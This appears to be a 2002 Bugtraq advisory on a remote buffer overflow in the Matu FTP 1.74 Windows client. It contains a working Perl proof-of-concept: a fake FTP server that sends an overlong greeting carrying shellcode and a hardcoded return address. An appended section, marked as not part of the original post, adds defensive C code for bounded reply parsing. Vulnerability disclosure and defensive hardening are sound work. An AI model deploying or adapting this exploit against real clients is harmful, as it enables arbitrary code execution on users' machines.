Matu FTP remote buffer overflow vulnerability
Message-ID: <20020422093546.22607.qmail@securityfocus.com>
Date: Mon, 22 Apr 2002 18:45:46 +0900
From: Kanatoko <anvil@jumperz.net>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
/*---------------------------
Description
---------------------------*/
Matu FTP is a Japanese FTP client for the Win32 platform.
We found an exploitable buffer overflow in Matu FTP version 1.74.
The buffer overflow occurs when a long string such as
220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>
is received by Matu FTP at the beginning of an FTP session.
This vulnerability allows a malicious FTP server to execute
arbitrary code on client hosts.
/*---------------------------
Vendor Status
---------------------------*/
Notified with no response
/*---------------------------
POC
---------------------------*/
This exploit code is invoked as an FTP server through inetd.
#!/usr/local/bin/perl
#------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#------------------------------------------------------
$|=1;
#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";
#egg_address = 0x0012F43C
$buf = "\x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "\x3C\xF4\x12\x00";
$buf .= "B" x 80;
print "220 $buf\r\n";
--
#sorry for the bad English
Kanatoko <anvil@jumperz.net>
http://www.jumperz.net/(Japanese)
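The client-side defect the advisory describes is a server reply line copied into a fixed-size buffer with no length check. The following C code is an added illustration of the missing check, not code from Kanatoko's post or from Matu FTP: a bounded reply-line reader plus a greeting validator. The buffer size FTP_LINE_MAX, the status codes and the "220 " + 'A' * n sample banner are all assumed or constructed here.

```c
#include <string.h>
#define FTP_LINE_MAX 256   /* capacity of the client's reply buffer (assumed value) */
enum { FTP_LINE_OK = 0, FTP_LINE_TOO_LONG = -1, FTP_LINE_INCOMPLETE = -2,
       FTP_LINE_MALFORMED = -3 };

/* Copy the first CRLF-terminated line of `in` into `out` (CRLF stripped, NUL-terminated).
 * Never writes beyond `out_cap` bytes: an overlong line is reported, not copied past the end. */
int ftp_read_reply_line(const unsigned char *in, size_t in_len,
                        char *out, size_t out_cap, size_t *consumed)
{
    for (size_t i = 0; i < in_len; i++) {
        if (in[i] == '\r' && i + 1 < in_len && in[i + 1] == '\n') {
            if (i + 1 > out_cap)            /* line body plus NUL must fit */
                return FTP_LINE_TOO_LONG;
            memcpy(out, in, i);
            out[i] = '\0';
            if (consumed) *consumed = i + 2;
            return FTP_LINE_OK;
        }
        if (i + 2 > out_cap)                /* this byte plus a NUL would not fit */
            return FTP_LINE_TOO_LONG;
    }
    return FTP_LINE_INCOMPLETE;             /* no CRLF yet: caller reads more */
}

/* Validate a server greeting: it must fit the buffer and start with a three-digit code
 * followed by ' ' or '-' (RFC 959 reply syntax). Returns the code (e.g. 220) or a negative status. */
int ftp_check_greeting(const unsigned char *in, size_t in_len)
{
    char line[FTP_LINE_MAX];
    int rc = ftp_read_reply_line(in, in_len, line, sizeof line, NULL);
    if (rc != FTP_LINE_OK) return rc;
    if (strlen(line) < 4 || (line[3] != ' ' && line[3] != '-')) return FTP_LINE_MALFORMED;
    for (int k = 0; k < 3; k++)
        if (line[k] < '0' || line[k] > '9') return FTP_LINE_MALFORMED;
    return (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
}

/* Constructed sample: "220 " followed by n_a 'A' bytes and CRLF, the banner shape the
 * advisory describes. Returns what ftp_check_greeting makes of it. */
int check_constructed_banner(size_t n_a)
{
    unsigned char msg[1024];
    if (n_a + 6 > sizeof msg) return FTP_LINE_TOO_LONG;   /* the sample itself is capped */
    memcpy(msg, "220 ", 4);
    memset(msg + 4, 'A', n_a);
    memcpy(msg + 4 + n_a, "\r\n", 2);
    return ftp_check_greeting(msg, n_a + 6);
}
```

A 20-byte banner is accepted and parsed as reply code 220; a 400-byte banner of the kind in the advisory is refused before a single byte is written outside the buffer.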